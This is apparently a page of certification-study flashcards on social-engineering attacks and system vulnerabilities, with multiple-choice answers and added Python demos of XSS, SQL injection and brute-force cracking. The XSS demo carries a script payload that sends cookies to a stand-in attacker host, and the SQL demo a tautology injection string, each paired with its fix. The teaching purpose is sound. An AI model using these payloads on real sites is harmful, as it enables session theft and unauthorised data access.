2.4: Explain common social-engineering attacks, threats, and vulnerabilities Flashcards
An unauthorised person gains physical access to a restricted area simply by following close behind an authorised person as they enter.
a. Tailgating
b. Shoulder surfing
c. Dumpster diving
d. Evil Twin
a. Tailgating
An employee uses their personal laptop to access company data. The laptop is not protected by the company's antivirus and firewall software.
What type of vulnerability is this?
a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems
d. BYOD
A company is still running an old version of Windows which is no longer supported by Microsoft and cannot apply the latest security patches.
What type of vulnerability is this?
a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems
b. EOL OSs
What type of attack inserts malicious scripts into a website, which can then be executed in users’ browsers, leading to data theft, session hijacking, or other attacks?
a. On-path attack
b. Brute-force attack
c. Structured Query Language (SQL) injection
d. Cross-site scripting (XSS)
d. Cross-site scripting (XSS)
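As an added illustration of the XSS card above (example code written for this page, not part of the original flashcards): a server-side template that drops an untrusted comment straight into HTML lets a script tag through to the browser, while HTML-encoding the value first makes the same input render as harmless text. The `PAYLOAD` string and the `render_comment_*` helper names are constructed for this example.

```python
import html

# Constructed attacker input: a comment that, if rendered as markup,
# ships the victim's cookie to an attacker-controlled host.
PAYLOAD = (
    "<script>document.location="
    "'https://evil.example/?c='+document.cookie</script>"
)


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates untrusted input directly into markup (stored/reflected XSS)."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """HTML-encodes the input so the browser treats it as text, not markup.

    html.escape(..., quote=True) rewrites < > & " and ' into entities,
    which covers the HTML-body and quoted-attribute contexts. A value
    placed inside a <script> block or an event handler needs a
    context-specific encoder instead; plain HTML escaping is not enough there.
    """
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def contains_script_tag(markup: str) -> bool:
    """Crude check used here to show whether a <script> element survived."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(PAYLOAD))
    print("safe:      ", render_comment_safe(PAYLOAD))
```

The defence is output encoding at the point where data meets markup, not input filtering: the same comment may legitimately contain `<` or `'` in a help-desk ticket, so the encoder, not a blocklist, decides how it is displayed.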
What type of attack inserts malicious SQL into a database query through a website's input fields, potentially allowing the attacker to steal or manipulate data?
a. On-path attack
b. Insider threat
c. Structured Query Language (SQL) injection
d. Cross-site scripting (XSS)
c. Structured Query Language (SQL) injection
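As an added illustration of the SQL injection card above (example code written for this page, not part of the original flashcards): building the query by string concatenation lets a crafted username rewrite the `WHERE` clause and return every row, whereas a parameterised query passes the same string to the database as a literal value. The in-memory SQLite table, its two rows and the `PAYLOAD` string are constructed for this example.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Creates a throwaway in-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Concatenates user input into SQL: the input can change the query's logic."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Binds the input as a parameter: it is compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker input. After concatenation the vulnerable query reads:
#   SELECT username, role FROM users WHERE username = 'x' OR '1'='1'
# and the always-true OR clause matches every row.
PAYLOAD = "x' OR '1'='1"


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))
    print("safe:      ", lookup_safe(db, PAYLOAD))
```

The parameterised version does not need to know what a "dangerous" character is; the driver sends the value separately from the statement text, so quoting tricks, comment sequences and stacked clauses never reach the SQL parser as code.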
What type of attack involves the attacker masking their identity as a trusted source, such as a bank, a friend, or a website, to trick users into revealing sensitive information or taking harmful actions?
a. DoS
b. Spoofing
c. On-path attack
d. Insider threat
b. Spoofing
What type of attack attempts to guess passwords or encryption keys by systematically trying every possible combination until it finds the correct one?
a. Spoofing
b. Brute-force attack
c. Dictionary attack
d. Structured Query Language (SQL) injection
b. Brute-force attack
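As an added illustration of the brute-force card and its dictionary-attack distractor (example code written for this page, not part of the original flashcards): a brute-force search enumerates every string over an alphabet up to a given length and is guaranteed to hit any password in that key space, at a cost that grows exponentially with length; a dictionary attack tries only a list of likely words, so it is fast but fails outright on anything not in the list. The SHA-256 target, the tiny lowercase alphabet and the four-entry wordlist are constructed for this example and are far smaller than real password cracking would use.

```python
import hashlib
import itertools
import string


def sha256_hex(text: str) -> str:
    """Stand-in for a stored password hash (a real system would use a slow, salted KDF)."""
    return hashlib.sha256(text.encode()).hexdigest()


def brute_force(target_hash: str, alphabet: str, max_len: int):
    """Tries every combination of `alphabet` from length 1 to max_len in order.

    Returns (recovered_password, attempts); (None, attempts) if the key space
    is exhausted without a match.
    """
    attempts = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate, attempts
    return None, attempts


def dictionary_attack(target_hash: str, wordlist: list):
    """Tries only the supplied candidates; cheap, but blind to anything not listed."""
    for attempts, word in enumerate(wordlist, start=1):
        if sha256_hex(word) == target_hash:
            return word, attempts
    return None, len(wordlist)


def keyspace_size(alphabet_len: int, max_len: int) -> int:
    """Number of candidates a brute-force search must cover in the worst case."""
    return sum(alphabet_len ** k for k in range(1, max_len + 1))


# Constructed wordlist of common passwords for the dictionary attack.
WORDLIST = ["123456", "password", "abc", "qwerty"]


if __name__ == "__main__":
    target = sha256_hex("abc")
    print("brute force:", brute_force(target, string.ascii_lowercase, 3))
    print("dictionary: ", dictionary_attack(target, WORDLIST))
    print("keyspace, 26 letters up to length 8:", keyspace_size(26, 8))
```

For the lowercase alphabet the search space is 26 + 26^2 + ... + 26^n candidates; at length 8 that is over 200 billion, which is why length and alphabet size (not "complexity rules" alone) drive brute-force resistance, and why the defence on the server side is rate limiting and a slow, salted hash rather than hoping the key space is large enough.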
A company's IT technician has sent instructions to an employee on how to install an authorised database management system. The employee mistakenly installs an older version of the system and struggles to configure it, as the setup doesn't match the technician's instructions. The employee manages to get the system up and running and continues to use the out-of-date software.
What type of vulnerability is this?
a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems
c. Non-compliant systems
An employee clicks on a malicious link in an email; malware infects their device and spreads to other systems on the network. What type of vulnerability is this?
a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems
e. Unprotected systems
A company doesn’t enforce operating system updates. What type of vulnerability is this?
a. Unpatched systems
b. EOL OSs
c. Non-compliant systems
d. BYOD
e. Unprotected systems
a. Unpatched systems